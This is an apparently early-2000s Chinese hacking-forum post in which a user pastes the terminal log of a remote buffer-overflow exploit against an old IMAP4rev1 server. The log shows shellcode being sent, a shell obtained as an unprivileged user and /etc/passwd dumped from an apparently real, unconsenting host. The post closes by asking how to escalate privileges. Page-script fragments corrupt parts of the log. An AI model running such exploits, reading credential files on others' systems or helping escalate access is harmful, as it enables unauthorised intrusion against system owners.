renx

级别:高级站友 威望:0 经验:0 货币:185 体力: 来源:211.158.8.* 总发帖数:162 注册日期:2001-05-30
|
|
查看 邮件 主页 QQ 消息 引用 复制 下载
通过特定版本IMAP可以得到一个shell
溢出是成功了。。当权限好象不够!!
[root@localhost hacker]# ./lsub XXX.XXX.XXX.XXX admin admin
0
Remote exploit for IMAP4rev1 v12.261, v12.264 and 2000.284
Developed by SkyLaZarT - www.BufferOverflow.org
Trying
to exploit xxx.xxx.xxx.xxx... Using return address 0xbffff3ec.
Shellcode size: 45 bytes
Connecting... OK Trying to
loging ... OK Sending shellcode... OK PRESS ENTER for
exploit status!!
uname -a Linux cickorea
2.2.15-2.5.0ax #1 配 2岿 26 16:32:49 KST 2000 i686 unknown
Exploit Success!! uid=1003 gid=1001 groups=1001
cat /etc/passwd root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2screen.width-300)this.width=screen.width-300'>aemon:/sbin:
adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0screen.width-300)this.width=screen.width-300'>ync:/sbin:/bin/sync
shutdown:x:6:0screen.width-300)this.width=screen.width-300'>hutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0screen.width-300)this.width=screen.width-300'>perator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP
User:/home/ftp: nobody:x:99:99:Nobody:/: xf
s:x:100:101:X Font Server:/etc/X11/fs:/bin/false
named:x:101:102:Named:/var/named:/bin/false
gdm:x:42:42::/home/gdm:/bin/bash
postgres:x:40:233screen.width-300)this.width=screen.width-300'>ostgreSQL
Server:/var/lib/pgsql:/bin/bash
cick:x:500:500:cick:/home/cick:/bin/bash
alias:x:501:501::/var/qmail/alias:/bin/bash
qmaild:x:502:501::/var/qmail:/bin/bash
qmaill:x:503:501::/var/qmail:/bin/bash
qmailp:x:504:501::/var/qmail:/bin/bash
qmailq:x:505:502::/var/qmail:/bin/bash
qmailr:x:506:502::/var/qmail:/bin/bash
qmails:x:507:502::/var/qmail:/bin/bash
有没有什么办法提升权限啊
[ 此消息由 renx 在
2002-04-21.16:55:17 编辑过 ] |